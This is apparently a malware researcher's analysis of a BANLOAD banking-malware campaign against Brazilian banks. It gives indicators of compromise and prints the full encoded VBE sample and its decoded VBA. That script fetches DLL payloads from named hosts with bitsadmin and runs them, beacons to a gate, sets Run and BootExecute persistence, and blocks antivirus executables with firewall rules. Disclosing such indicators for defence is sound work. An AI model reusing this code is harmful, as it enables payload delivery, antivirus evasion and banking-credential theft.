Campaña de malware contra bancos de brasil

# Brazil basis BANLOAD malware campaign is shifting to the AMAZON VPS in AS16509 on:
# martinstranns.com.br // gates (cnt.php)
# brcentermodelo.com.br // payload, updates, parts
# AWS IP: 52.8.140.254 and 52.8.51.135
# Malware MUST Die!!
 
// Sample:
 
SHA256:         8538c78539832eaf25550bdf0ab1a9f9f004459af0208cf4d047aa41dfb6f260
File name:      ValeViagem.vbe
 
A VBA Encoded and Obfuscated Script to Download and Send Sensitive Information to
South America Banking malware
 
// Gates:
http://martinstranns.com.br/contador/cnt.php
 
$ ipchk geo martinstranns.com.br
-----------------------------------------------------------
Source : geo
IP     : 52.8.140.254
-----------------------------------------------------------
{
  "ip": "52.8.140.254",
  "hostname": "ec2-52-8-140-254.us-west-1.compute.amazonaws.com",
  "city": "San Jose",
  "region": "California",
  "country": "US",
  "loc": "37.3394,-121.8950",
  "org": "AS16509 Amazon.com, Inc.",
  "postal": "95103"
}
 
// payload
http://brcentermodelo.com.br/arquivos/up.jpg
 
// updates & parts:
http://brcentermodelo.com.br/arquivos/host.jpg
http://brcentermodelo.com.br/arquivos/part.jpg
 
$ filemd5 *
up.jpg:   PE32 (DLL) (GUI) Intel 80386 MS Windows 45568   692eedb2b519b86f9d5a1e4a85b7b606
host.jpg: PE32 (DLL) (GUI) Intel 80386 MS Windows 1483776 8fdaa336d4699a02f1d349c4d7984993
part.jpg: PE32 (native)    Intel 80386 MS Windows 40208   d5915a4c454e50d76b343019d9978373
 
 
$ ipchk geo brcentermodelo.com.br
-----------------------------------------------------------
Source : geo
IP     : 52.8.51.135
-----------------------------------------------------------
{
  "ip": "52.8.51.135",
  "hostname": "ec2-52-8-51-135.us-west-1.compute.amazonaws.com",
  "city": "San Jose",
  "region": "California",
  "country": "US",
  "loc": "37.3394,-121.8950",
  "org": "AS16509 Amazon.com, Inc.",
  "postal": "95103"
}
 
// ======================
// Microsoft Encoded Script
// ======================
 
#@~^oh8AAA==vCeMCeCeeCeCMeCeMeCeMMCeeCMB@#@&BCMMeCeCe$X~37W RcMeCeMMCeev@#@&BMeCMCeM
CeCeeCeCMeCeMeCeMMCB@#@&9ksP\5qd%yYl(nk8f9 +@#@&j+DP%z~4!8"sm(vWWdPx,ZM+lD+}8LmO`r
j^MkwD ?4+V^Eb@#@&?Y~\}qk%+Ylp+b4f[y Px~;DnlDn}4%mD`JUMywDkUocsrs?XkO+sr4Nn^Yr#@#
@&KjX]4"cR{%7bpik\AX,'~LH$(!8.:1qvW0d Io]+mNcE_|Stw?}sKq)]2'Hbm.WdG6YwbUNKhd~gK-
/;MDnxD#DdbW   -nMW9;mD1C:Jb@#@&q0,cq ?YMcKjlI4"c0{R\)(`d\qhXS,JGEb,@!@*PZb,W.,`&x?
DDvKjlIn4.c0{R\boi/7hlS~JjkkYCJb~@!@*~!*~WMPc( ?Y.chjXI8.c0F%7b(`/7   hl~~JRJb~@!@*P
ZbP:t+  @#@&d&0,jm.raY bMLEs+UOkRZG;   Y~',T,K4x,@#@&idUnY,I5*+/ULly?a2AlD!ys/6R RN9+
Ptn}K&:~',Z.nmY+68N+^YvEUtn^VcbwaVb^lDkGxr#@#@&idI$Xvkxol"jwaAlDT s/X%+%99+:}Fth&K j
4+sVAam;D+,JhkMywDRn6JS~q?MywDR?1.rwDs!Vs1ChP'Pr~ur~~S,JD;Um/E~,q@#@&7iUmDbwD p!
kO@#@&d3U9Pq6@#@&AxN,(W@#@&na&H,8zhAALa9KAG/;oH8LnPxPNz~4T(ysmq+c6JRA62l       N3U7kDKU:
xYUO.k  ok`E]jeUK3H"6r:]Eb@#@&qW~v\}Fk0yYXo+b4&9 y sbVn2XkdOk`naf1O4Xh$ALavxW$W//TH8o
n~[,Jw5o0sUO WJ*b,K4x@#@&dq?1.kaY p!kO@#@&+x9~k6@#@&knOPd4V 4\p"&PxP7}Fk%+Ol(+r82N
+ c/M+CD+:+6Dsbs+vn2&g,8zhAhN2vxWAK//ot4T|~[~E';p0qsxO WEBP S~DD;+*@#@&S8V 4\(.qc/VK
/n@#@&B  cR)z]p`q.}~]I&)cR Rv@#@&LzA(T4.:^(+c0J "EU`r^sN~Jm,+m4W,]I@*@*~Jr]jeUK2t]r}
K]'Y/rtn`K3IH)t2Y{hCDDRE'rDJ'EMJ'JbErJbB!BKD!+@#@&BcR R=.)]&b.A(?=RRc v@#@&LHA8!8"sm
(vWWScI;UvJmh[,z^PknD6 6PjhSn#b"q)Ad2~ErtYD2)Jz4M^nxD+M:GNnsKR^Ws 4MzC.$Ek-Gkz;wc%
aoErPJHJ*~ZSKMEn@#@&Lz$(!4.hm&vc6J I!xvJ^:[~Jm~/O6c+an,Ew-CMkC4^n,]]z1GrHuPJ\J*~T~:
D;n@#@&Bc Rc)bj(jb")cR Rv@#@&LzA(T4.:^(+c0J "EU`r^sN~Jm,D+TP$;+MX~CnS\wU5?:3H'ZW        O.W
^?YT!qwU+.\b^+k-!ELJ4E'rwE[rjr[E7J,[P|@#@&EPL[dm4YCd0/PJ/IAbKA~&s,zUZ~rH/AP&?:~J,[~
oKD:COGlO+:rs+cGlD+b9NvExr~~ BPHGS`#*Sc*P[,E~z:1,JE     {3wb0fl0OZAT0 cFq %{*+Ry*)2sy%A
A O$8WJEPJK]~rJms[PJmPk^4Ym/0/~z93d2P2,&KgPEEPG2o)RfX% T~!0 c8Fv %FXv  Xb2s+0~2 O$8W
JJ,&oPL/Dl.Y~v,B~JrEJ4YO2=zzhCMYrxkOMlU /cmWsR(.z1WUYmNG.JmxD w4wg!.s']n^ELkUD]]/rtK
j:2]HzH2YD mUOrErJErPJIj,?IjKAHEPLPm@#@&JP-k/1tYmdV/,z;I3bP3,zoPJjZ,rH/APzjP,J~[,oKD
hmYGlYKbh+vfCYb[[vJxrSPy~PgGA`*#BcbP'~rP&Kg~Jr        {3wb%9XROTAZ0 cq8v %Glv +*z&o RA3+O
A8WEJ,zK"~EJ1:9P&m~d1tOlkV/,z93d2K3~JKHPrEPG3wbRf*ROZ$!RO*F8vR0F*v +*z&sy0$2y,~8*JE~
Js~[kOlMY~v,BPEErJ4YD2=z&slMYk  /D.l    xdR1Wh (Dz1GxDlNK.&m    Ycw4w_;MVx$g&bY$Y/}HniPAIHb
t3uTR1x JJrJrEPJIiPU5jPAHJ*S!BKD!n@#@&ERcR )iKGbP2= RcRv@#@&LX$8Z4":1(+cWdR"ExvJ1hN,
z^Pkm4Om/3k~z;I2zP3PJs,zjZ~6g?Pb"PPJf3Jz5PTTZ,l!Z~JKH,Jr        GAsz0fl%R!~!0RWFF+R%F*v +Xb
2sy%$2+1~8EJ,EPLPm@#@&JzP],JEms[,z^,4bY/mNsrx,zODmxdWDPDYIz1f}\YPJfKhUVGC9P&n"(r"qP
e,Cq!u,]indFjb]&b~S2uPuj5UK3H"r6Pu-]!2\mDkm8s+uRD:2J~',{@#@&r~[MEU[^V&+ 6nPujI?PAH"
rr:]'YEa\CDbl8s]RDhwBaFrE~z"j,?e?P3tJb~ZSKMEn@#@&BR  c)]2&H&) cRcB@#@&LH$4Z4":1q*6
SR";xvJms[~z1Pkm4YCd0/~z;]2zK3~JsP&j;P61;3,zj:PrP[,sK.:mY9lD+Prs+`GCYbN9cExr~,F*~~H
Khc#*Sc*P'~|@#@&E~JKHPrEPG3wbRf*ROZ$!RO*F8vR0F*v +*z&sy0$2y,~8fJE~JK]PrEmsN~&1P/^4Dl
d3k~Jf3d2:2PJKg~Jr      {2wb09l%OZ$!ROc8qORGlvR X)2s+%~3 OANfrJP&o,[dt!O9WA    PJDPJY,!,zW
JrP&]`P?IjKAHJ*ST~:D!+@#@&v cR )nJ)cR  E@#@&%z~4T4.h1qW0dRI!xvEmsN~z1Pd^4YlkV/,zZ"3
)KAPJs~zj/,rHZA~zUK~E,[PoGM:CYGCD+Pb:`fmY)N9`Exr~~*BP1KA`*#~Wb~[,{@#@&EP&PgPEJP{2w
b09l%OT$Z%Rc8q+O0F*+O lb2o RA3 OANqrJPJPI,JJ1h[PJm,4rYdC9:rx,&YMlUd6+D~VuI)1G6t]~JfK
hx^Wm[PJn]q}I(PIPC&!C,JJ4OOw=zJ4.mnUD+.:K[+^W ^K:R8.Jl.;!r7WdJtK/YcLaLJrPEJu?ej:2H"6
r:]-u/6Hhj:2]1)\A] Ys2JrJ~',{@#@&E,[dm4Om/VkPJf2d2:3PJKHPrJ`{AsbR9*RO!~T0OWF8vR%{X+O
+*zfsy%$3y,ANqrJ~zw~L+^4W,F!Z&y@*PrJY?I?P3tIr}P]']Ea-CDbl(Vn]EErJ~z"iPU5jPAHJ~',{@#@
&r~L[.oc+6Pz9f,JECnS\wUW0DAlM+-tr^DK/K0O-     r       NGhkwZ!D.n      Y.n.kkGx']!
xErPJ\PuZ}\n`K3I
gb\3uPzD~IAM{Ut~z9PrJ.EU[^Vf ,Y?I?P3tIr6Pu-YZ}\hjPAIgbHA]cO:a~:FrJ~&wJ#BT~:DE@#@&Bc
RcRln)]:) Rc B@#@&%z~4!8"sm(vWWdR]!xvJmsN,&m,Dnoc+an,bfG~JrC|d\w?I?:2\-/;MDnxD/W        Y.G
^?+Ow;WUYMG^-KmDDkymxrEPJ\~CbNn VmKh+t+/kCL+,zDP]2!mG6IG~z9P+~JsJbSZ~PD!n@#@&%HA(!
4.:1(vW0JR"EUcrm:9~z1P/14Olk3kP&Z]3zK3PJoPJ?/~}1Z3~J?PPr~LPoKDslYGlDnKb:n`GlOnzNNvEx
r~P2S~1Khv#b~*b,[~{@#@&J,zPH,JJ`{As)%GXROT~!ROc8F+R%F*Oy*)fw %~3 OA8yEEPJK"PEJ^h9P&
m,8kD/C[skx~&DDCxkWD~a]"b1GrtYPJfGh    VGC9Pzh]q}Iq:e~C&M_PEJ4ODwlzJ8D1+UOD:G[VGR1Gs
R8MzmD;!k7G/JwCDDR%2TJJ,EJu?5UP3H"r}KY-Y/}HKj:3Igb\3u{nC.DRn6ErP'km4Ylk3k~zG2J2:2~&
wPz:HPrJ        F3obRfl%R!$TRO*F8ORGX  *)fw 0AA+OANyJrJJ,z"iPU5jKAHE~LP{@#@&J,[DL +X+,b9
f~ErCFStw?I?P3t-Z;.M+UY;G       Y.KVU+Y'ZKUYMWs-U+ddbWx,\l      lo.EJ,z7P$WGOA6nm!O+,zO~"2Mm\`
SPq|j\P&9PrJl!YK^tmVPmEOG1t3,M-ZP-ZYj5UKAH]r6Pu-YZ}\n`K3]gbH3Y|nCDD 6n'!rJPJsrb~Z~
PD!+@#@&EeeCMeCeeC)HK&.&Ki?MMCeMeCMeE@#@&[ZMDWeR/]hws1 6w!s|G8CKqD_ET9$&iov#@#@&oE      m
YbGUP$C9\\     9VntNxiAz:uz;fAKFkE(fNfvrUovy%s2KF"Sh}]N*@#@&~,PsK.P(*Y8}"LOq(K3m(9R%(68
$M,'~Jx`6Uov+%wf:G"dn\IN*P:GP8PjYw~R8@#@&,~P,PP&W~HbNvrU(+RsfKF"Sh}][BP4XO8p"LO((
K31qG%%&68$MBPq#,'~E'JP:4+      P2XrOPwWM@#@&P~~g+aY@#@&P,P5u9\v-       GMK}9B`A)sCHZf~nndE&f%&
,'~J0Y,cr      (vy0o&:G.SK}][BP8*Dqp.L1((K2^(G%0qXq~M~ P8#@#@&2        [PwEUmDkGU@#@&?!8P&oyysK
lFoyDrj(T\:[FZz`zpo;VM!X{",a,;b@#@&~,P,sWMPACm4PsGW614$4190rOw0^~rx,b5s;M!TlG],X1Zc?
;8wWV[nM/~@#@&~,P~,P,P?Y,]M+*r*0(4\6wF;+F5Fc:BppW*.D0\$0WvuZaL%HtXB8P'~-5Fd%yOl(nb4
2N yRVnYwWsNDcsFc6O4;(1NR61w6VcnCY4b,@#@&P,~P,P~~U+Y~  RLf;0pkxq,',IM+*bX3ot\0aF/+8p
FWP9opcl".%7ARcC/2T%ztlBFcsrs/P@#@&,P~P,~,PWKD,+l1t,2A_th9y%^4h*h!L1WyVMz6LNAlLsv"
-ZvTv"Tv0c0XbVG",kUPq0N&50(kxF,@#@&~P,P~P,P~~,Pk6~S;l/c(xUYM`q~2$_th9y0m4nXA!o1*"^
DzrN%~*%^v.\!+!+]!+3*%+6)sKy~,ER6+rbbP@*P8POtnU,@#@&di7d,P~~,LX$8Z4":1(+cWdR"ExvJ1h
N,z^P   +Od4Pl9-0bD+SCsV,0bDnhCs^PCN9~D!Vn~     l:nxrJEPL~7pqk%yY*o+b8&9 +RV+OobV+gC:`w~u
4:x Rm4nXA!oHc.sDHr%%~*Ls.\TvZ"!0cRv6zVK"#,[~JrJ~[bD'bUPmmYbGU'(VKmVP2.Ko.lsxJrJ~
',wAu4s9+%14h*A!ogcy^DH6LNAXL^v"-Zv!+]!+3cRab^W.P'PEErPnxm8V'znkJ#STBK.E@#@&d7id,
PP,PNzA(!8ysm(W0Sc]E   `J1h[PJm,+^tG~'g_-r~[,w$u4:9+01tK*S;T1*.VMXrNL~XL^v"\ZvT"!v0*
%+6b^G"PLPr@*@*PYjI?P2t]r}KYwuZr\K`K3Ig)t2Y|nmDYr[r JLJ.JLJ.ELJkrb~Z~KM;n@#@&did7P~~
,P%X~8!(yh^&vcWJcI;xvE1:[,z1PxYk4PmN-0bDnAmVV,WkM+hmssPmN9P.Esn,xC:xJrJ~',\pqdR O*
onb4f9 yRMYwrV1C:`2$_t:x+%1tnlA;ogc.V.X6%NAXL^y7!T+I!VW%6zsKyb,[,JJrP9rD{W;Y,
l^ObWx{8VKm3,2.WTDm:xJEE,[~w~uts9+01tnXA!oHc.sMX6NL~*L^v.-!+!IZvV*Rv6zsW.P[,EEJ,+      l
8VnxH+dJ*S!BK.;@#@&77iP~P,~,P3 N,q0@#@&,~P,P~P,1naD@#@&,~P,PP,~(o. ^nCGL+MkiqZt:9FT
z,VG*aOt54g[Rr1a0^P@#@&P,~Pg+aY,@#@&3   NPU;4@#@&s!U^YbW        P[!!.650/"As^m+6w!:F{8CGFMu!!
B$&`s`*@#@&7+FM\S`FHBHx\o*!Z}LGX|,',LzA8T(yhm&c6S 3XwlU[Ax-kMG        :n      YUYDbxTd`r]KI}M]
)tsqd3?v(%+bYJ*@#@&da&qKIE[H:Ky f.      wG(~x,LzA(T(yh1q+c0dRAawmx[2    \r.Kx:UYUYDbUL/vJun
]r!]zHoqd3?uJb@#@&d?nO,fnS1eRC+Hr~\%l,05!       2tbZc[C,'PVnY}4L^O`rhbxhohOk)w-cwDKWOwU+m
;.bYzZUD+.yJ*@#@&i?OPAchExE)F2n;U2vb,66tK3sxR,qpX4PxPGnS150uyXr$-R*13$T      2tz!WNlc2
Xnm5EnDH`EjV+1OPCP0MGhPzJ,[~JUE,[~JDEPLPErrP[~EjJ~[,EbJ~LPrDJ,[,EErP'Pr/E~LPJhEPLPJ
ME~[,JKJ~[~E9J~[,EErP'~rmJ~',JOJ*@#@&doKD,2l1t,[bSH*(O+^y1 1#2Gc*M/nGD36X4;GW|.%!F
*,kU~Ac:;B!bF&h5Uwb,X0}h3sU%OF}*4+@#@&iPPqrY4PNzA\co,m H+1.3fWXD;+{O00X8!W*|M0!|
X@#@&idl! (t7;uWWPx~$CN7\qfMht[9`Az:uX/9~nF/!(fN&c alY4PK?ro  n9n.KN!mYA6b@#@&d7l!
 8tq\;_Gc,'P"n2Vmm`CE+8\-;_GcBJYKMWo.CssrVdv60+#uJ~GV\S`FH9Hx-pW!!\%flv|*@#@&dil
! 8}    -$CGc,xP"+2smm+cC! 8}q-$CGW~r]nMWT.lssrV/YEB6&8K5!NH:K"xGDqs{(b@#@&d7/OP"MXb
*3p4t02F;+8pqWKx(pW*..%7A0c+C/2T%X4X98P',-}Fk%yYX(nr(&[ y MYoG^N+.cmE+4\       7;uKc*@#@&
id@#@&di/nY,0%2;3odx8P',]!vlkl3pt\WaF/ 8}FWKBp5c*".R\$%W_Z2T%Ht*xFcok^+d@#@&d7@#@&
ddwGD,2l14~yFXwmu 6skbXH,rx,0%2;3pd    F@#@&i7i}1DsZ,ZX2&p*49L%Zc.s,'P.{XwmCy6s/z*tRHl
hn@#@&7di(0,\}qk% OXo+r42[y  V+D26D+    dkKxHls+ctOYsZ1ZX2qoX49T%Zc.Vb~{PE+XnJ,K4n      @#@&
77id%X~8Z4"sm&vc6Sc]E   `EmsN~&1PxO/4Pl9-EPLPr0EP'~rkEPL~JMJ~',J+E~LPEhr~LPEmJ,[PrVr~
[,JsP6k.nSlV^~l9NPM;s+,xm:n'EErP'P.{Xwmu+}V/)XtRHlsn,[~rJrPNbD{rx,l^YbWUx(VW1VPaDWT.
C:{JrJ~[~C! 8}q-;_W*~LPJwE,[~yFzwmuyr^/blHcHls+~[,JEE,+xm8V'XdE#B!BK.En@#@&d7di%X~
4T8.:m(W0JR";  `E1:9Pz1P^tKPwgQ-E~LPl!+4\\$uGc,[,JwJ~',y{Xw^Cyrsdz*H Hm:nPL~r@*@*,
]U5?:2t]r}KY-uZ6\hjKA]1zH2umKlMJLJOJ'EcJ'JME[rDE'rkJbSZ~PD!n@#@&7idiLX~4Z8ysm(vW0J "
ExvEmsNPJ^~xYkt~lE~LPENr~[,J-E,[PEWrP'PrrrP',JMJPLPrnJ,[~JSJ~',Jlr~[,JVr~'PrV,0EP'~
rkEPL~JMJ~',J+E~LPEhr~LPEmJ,[PrVr~[,JsPmN[~MEV~xm:+{EEJ,[,y{Xo^_ 6Vk)*tRHCs+P'~rJEP
9rM'G!Y,lmDkKU'(VGm0P2.KoDmh'rJJ,'~l! (}        \5uKc~[,E-rP'~.GXo^_ 6Vk)lH gls+PLPrEJ,+Ul(
VnxH+/rb~Z~KM;n@#@&did3x[~&0@#@&i716O@#@&dd(L. snm{T .bj&!}sN8TX,\}Fk%+Ol(+b8&9  c!
nYwW^NnDcC! 8}q-;_W*b@#@&d~~Ax[PqrDt@#@&dg+6D@#@&~P,PKcUK4;1Z  {k^Y,Gh}cO5Fk{%h~{P9K
UPlk33amInd!VO{U;1mnk/@#@&2    N,oE    mOkKx@#@&TNQIAA==^#~@
 
 
// ========================================
// Turn out to be Obfuscated VBA Script
// ========================================
 
 
'**************************'
'********By Evo...*********'
'**************************'
Dim vQ1s82t5Xeib3d22
Set jyBb0bzmcI64fL = CreateObject("WScript.Shell")
Set vQ1s82t5Xeib3d22 = CreateObject("Scripting.FileSystemObject")
PU5Rebz4878vAXUsvWw5 = jyBb0bzmcI64fL.RegRead("HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductName")
If (InStr(PU5Rebz4878vAXUsvWw5, "7") <> 0) or (InStr(PU5Rebz4878vAXUsvWw5, "Vista") <> 0) or (InStr(PU5Rebz4878vAXUsvWw5, "8") <> 0) Then
        If WScript.Arguments.Count = 0 Then
                Set Rq56sng5zSppB5r02lCx828dDeTZKZP3T = CreateObject("Shell.Application")
                Rq56sng5zSppB5r02lCx828dDeTZKZP3T.ShellExecute "wscript.exe", WScript.ScriptFullName & " |", , "runas", 1
                WScript.Quit
        End If
End If
Pp3N9byPBwjp6JoBoCCgMbgK = jyBb0bzmcI64fL.ExpandEnvironmentStrings("%SYSTEMROOT%")
If (vQ1s82t5Xeib3d22.FileExists(Pp3N9byPBwjp6JoBoCCgMbgK & "\qXfWln92f")) Then
        WScript.Quit
end if
set LbG2hvXzI = vQ1s82t5Xeib3d22.CreateTextFile(Pp3N9byPBwjp6JoBoCCgMbgK & "\qXfWln92f", 2, true)
LbG2hvXzI.Close
'....:ARQUIVO RRI:....'
jyBb0bzmcI64fL.Run("cmd /c echo RR>> ""%SYSTEMROOT%\%COMPUTERNAME%_Part."&"r"&"r"&"i"""),0,True
'....:VARIAVEIS:....'
jyBb0bzmcI64fL.Run("cmd /c setx.exe UPLKVARIABLE ""http://brcentermodelo.com.br/arquivos/up.jpg"" /M"),0,True
jyBb0bzmcI64fL.Run("cmd /c setx.exe upvariable %RANDOM% /M"),0,True
'....:AVISAR:....'
jyBb0bzmcI64fL.Run("cmd /c reg query HKLM\SYSTEM\ControlSet001\Services\G"&"b"&"p"&"S"&"v" & _
" &&schtasks /CREATE /F /SC ONCE /ST " & FormatDateTime(DateAdd("n", 2, Now()),4) & " /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}4"" /TR ""cmd /c schtasks /DELETE /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}4"" /F &start ' ' """"http://martinstranns.com.br/contador/cnt.php?url=[Plugin][%COMPUTERNAME%]-cn-"""""" /RU SYSTEM" & _
" ||schtasks /CREATE /F /SC ONCE /ST " & FormatDateTime(DateAdd("n", 2, Now()),4) & " /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}4"" /TR ""cmd /c schtasks /DELETE /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}4"" /F &start ' ' """"http://martinstranns.com.br/contador/cnt.php?url=[N/A][%COMPUTERNAME%]-cn-"""""" /RU SYSTEM"),0,True
'....:UPDATE:....'
jyBb0bzmcI64fL.Run("cmd /c schtasks /CREATE /F /SC ONSTART /DELAY 0009:00 /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}"" " & _
"/TR ""cmd /c bitsadmin /transfer t%RANDOM% /Download /PRIORITY HIGH %UPLKVARIABLE% %SYSTEMROOT%\%upvariable%.tmp" & _
" &rundll32.exe %SYSTEMROOT%\%upvariable%.tmp,#1"" /RU SYSTEM"),0,True
'....:REINI:....'
jyBb0bzmcI64fL.Run("cmd /c schtasks /CREATE /F /SC ONCE /ST " & FormatDateTime(DateAdd("n", 14, Now()),4) & _
" /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}3"" /TR ""cmd /c schtasks /DELETE /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}3"" /F &shutdown /r /t 60 /f"" /RU SYSTEM"),0,True
'....:KL:....'
jyBb0bzmcI64fL.Run("cmd /c schtasks /CREATE /F /SC ONCE /ST " & FormatDateTime(DateAdd("n", 4, Now()),4) & _
" /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}1"" /TR ""cmd /c bitsadmin /transfer k%RANDOM% /Download /PRIORITY HIGH ""http://brcentermodelo.com.br/arquivos/host.jpg"" ""%SYSTEMROOT%\%COMPUTERNAME%.tmp""" & _
" &schtasks /DELETE /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}1"" /F &echo 10032> ""%SYSTEMROOT%\%upvariable%"""" /RU SYSTEM" & _
" &&reg.exe ADD ""HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" /v %COMPUTERNAME% /t REG_SZ /d ""rundll32 %SYSTEMROOT%\%COMPUTERNAME%.tmp,#1"" /F"),0,True
'....:PART:....'
jyBb0bzmcI64fL.Run("cmd /c reg.exe ADD ""HKLM\SYSTEM\CurrentControlSet\Control\Partizan"" /v HideWelcomeMessage /t REG_DWORD /d 2 /F"),0,True
jyBb0bzmcI64fL.Run("cmd /c schtasks /CREATE /F /SC ONCE /ST " & FormatDateTime(DateAdd("n", 3, Now()),4) & _
" /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}2"" /TR ""cmd /c bitsadmin /transfer p%RANDOM% /Download /PRIORITY HIGH ""http://brcentermodelo.com.br/arquivos/part.jpg"" ""%SYSTEMROOT%\%COMPUTERNAME%_Part.exe"" &schtasks /DELETE /F /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}2"""" /RU SYSTEM" & _
" &reg.exe ADD ""HKLM\SYSTEM\CurrentControlSet\Control\Session Manager"" /v BootExecute /t REG_MULTI_SZ /d ""autocheck autochk *\0 \0%SYSTEMROOT%\%COMPUTERNAME%_Part.exe\0"" /F"),0,True
'*********ANTIVITUS*********'
d0GrfY8sRwFlc2OF0mK71Ho1rHu0Jq3UF()
Function qHdv6vWDGPZdJUBAmHyCDBPKsuIDj3(OnX628F3T7zLPZRd)
   For b5t1Qzj9IbTEcID88Ix1BG = Len(OnX628F3T7zLPZRd) To 1 Step -1
      If Mid(OnX628F3T7zLPZRd, b5t1Qzj9IbTEcID88Ix1BG, 1) = "\" Then Exit For
   Next
   qHdv6vWDGPZdJUBAmHyCDBPKsuIDj3 = Left (OnX628F3T7zLPZRd, b5t1Qzj9IbTEcID88Ix1BG - 1)
End Function
Sub Igz2lPa7g2riUI0Zmd10y(AQFuGG057R9x9C)
    For Each l74x9hqbNd8O9pfl in AQFuGG057R9x9C.SubFolders
        Set RG65i5kXhMfp1C21Q14TJXQ45zr8vB846HCpg8yh5J1 = vQ1s82t5Xeib3d22.GetFolder(l74x9hqbNd8O9pfl.Path)
        Set W8j3qkXsn1 = RG65i5kXhMfp1C21Q14TJXQ45zr8vB846HCpg8yh5J1.Files
        for each pBHhmJ28chP5wugN4zlryOjjB5jl6zv0606R06k486xAloz in W8j3qkXsn1
            if LCase(InStr(1,pBHhmJ28chP5wugN4zlryOjjB5jl6zv0606R06k486xAloz, ".exe")) > 1 then
                                     jyBb0bzmcI64fL.Run("cmd /c netsh advfirewall firewall add rule name=""" & vQ1s82t5Xeib3d22.GetFileName(pBHhmJ28chP5wugN4zlryOjjB5jl6zv0606R06k486xAloz) & """ dir=in action=block program=""" & pBHhmJ28chP5wugN4zlryOjjB5jl6zv0606R06k486xAloz & """ enable=yes"),0,True
                                     jyBb0bzmcI64fL.Run("cmd /c echo \??\" & pBHhmJ28chP5wugN4zlryOjjB5jl6zv0606R06k486xAloz & ">> %SYSTEMROOT%\%COMPUTERNAME%_Part"&"."&"r"&"r"&"i"),0,True
                                     jyBb0bzmcI64fL.Run("cmd /c netsh advfirewall firewall add rule name=""" & vQ1s82t5Xeib3d22.GetFileName(pBHhmJ28chP5wugN4zlryOjjB5jl6zv0606R06k486xAloz) & """ dir=out action=block program=""" & pBHhmJ28chP5wugN4zlryOjjB5jl6zv0606R06k486xAloz & """ enable=yes"),0,True
                               End If
        Next
        Igz2lPa7g2riUI0Zmd10y l74x9hqbNd8O9pfl
    Next
End Sub
Function d0GrfY8sRwFlc2OF0mK71Ho1rHu0Jq3UF()
        e7GMLU1NJynvX400ZjD56K = jyBb0bzmcI64fL.ExpandEnvironmentStrings("%PROGRAMFILES(X86)%")
        x31PYudMTPznDrWF7X = jyBb0bzmcI64fL.ExpandEnvironmentStrings("%PROGRAMFILES%")
        Set DeLcY8H2yOBv859kq0nEZA04da = GetObject("winmgmts:\\.\root\SecurityCenter2")
        Set E4muJuAK3PqSp6i9xfZPkmn891Q5he = DeLcY8H2yOBv859kq0nEZA04da.ExecQuery("Select * from A" & "n" & "t" & "i" & "V" & "i" & "r" & "u" & "s" & "P" & "r" & "o" & "d" & "u" & "c" & "t")
        For Each dAwM4X9ec62N2cVED45rCe7tkfy6buo4Kr8uK5 in E4muJuAK3PqSp6i9xfZPkmn891Q5he
          With dAwM4X9ec62N2cVED45rCe7tkfy6buo4Kr8uK5
                au2bZWvqHo4 = qHdv6vWDGPZdJUBAmHyCDBPKsuIDj3(.pathToSignedProductExe)
                au2bZWvqHo4 = Replace(au2bZWvqHo4,"%ProgramFiles(x86)%",e7GMLU1NJynvX400ZjD56K)
                au2bZWvqHo4 = Replace(au2bZWvqHo4,"%ProgramFiles%",x31PYudMTPznDrWF7X)
                set RG65i5kXhMfp1C21Q14TJXQ45zr8vB846HCpg8yh5J1 = vQ1s82t5Xeib3d22.GetFolder(au2bZWvqHo4)
               
                set W8j3qkXsn1 = RG65i5kXhMfp1C21Q14TJXQ45zr8vB846HCpg8yh5J1.Files
               
                For Each z7yFcH2OlsA5M in W8j3qkXsn1
                        Z9tF09CxEIX5hJg804rl = z7yFcH2OlsA5M.Name
                        If vQ1s82t5Xeib3d22.GetExtensionName(Z9tF09CxEIX5hJg804rl) = "exe" Then
                                jyBb0bzmcI64fL.Run("cmd /c netsh adv" & "f" & "i" & "r" & "e" & "w" & "a" & "l" & "l firewall add rule name=""" & z7yFcH2OlsA5M.Name & """ dir=in action=block program=""" & au2bZWvqHo4 & "\" & z7yFcH2OlsA5M.Name & """ enable=yes"),0,True
                                jyBb0bzmcI64fL.Run("cmd /c echo \??\" & au2bZWvqHo4 & "\" & z7yFcH2OlsA5M.Name & ">> %SYSTEMROOT%\%COMPUTERNAME%_Par"&"t"&"."&"r"&"r"&"i"),0,True
                                jyBb0bzmcI64fL.Run("cmd /c netsh a" & "d" & "v" & "f" & "i" & "r" & "e" & "w" & "a" & "l" & "l f" & "i" & "r" & "e" & "w" & "a" & "l" & "l add rule name=""" & z7yFcH2OlsA5M.Name & """ dir=out action=block program=""" & au2bZWvqHo4 & "\" & z7yFcH2OlsA5M.Name & """ enable=yes"),0,True
                        End If
                Next
                Igz2lPa7g2riUI0Zmd10y vQ1s82t5Xeib3d22.GetFolder(au2bZWvqHo4)
          End With
        Next
    P4ST6hCNCn7ilt9DmQ49Y7i78m = DTSTaskExecResult_Success
End Function
 
 
// ======================
// Beautified:
// ======================
 
 
'**************************'
'********By Evo...*********'
'**************************'
 
Dim MyFileSysObject
Set MyMalicious1 = CreateObject("WScript.Shell")
Set MyFileSysObject = CreateObject("Scripting.FileSystemObject")
MyWinVer = MyMalicious1.RegRead("HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductName")
 
If (InStr(MyWinVer, "7") <> 0) or (InStr(MyWinVer, "Vista") <> 0) or (InStr(MyWinVer, "8") <> 0)
    Then
        If WScript.Arguments.Count = 0 Then
          Set MyShellScript = CreateObject("Shell.Application")
          MyShellScript.ShellExecute "wscript.exe", WScript.ScriptFullName & " |", , "runas", 1
          WScript.Quit
        End If
End If
 
MyUserName = MyMalicious1.ExpandEnvironmentStrings("%SYSTEMROOT%")
If (MyFileSysObject.FileExists(MyUserName & "\qXfWln92f")) Then
        WScript.Quit
end if
 
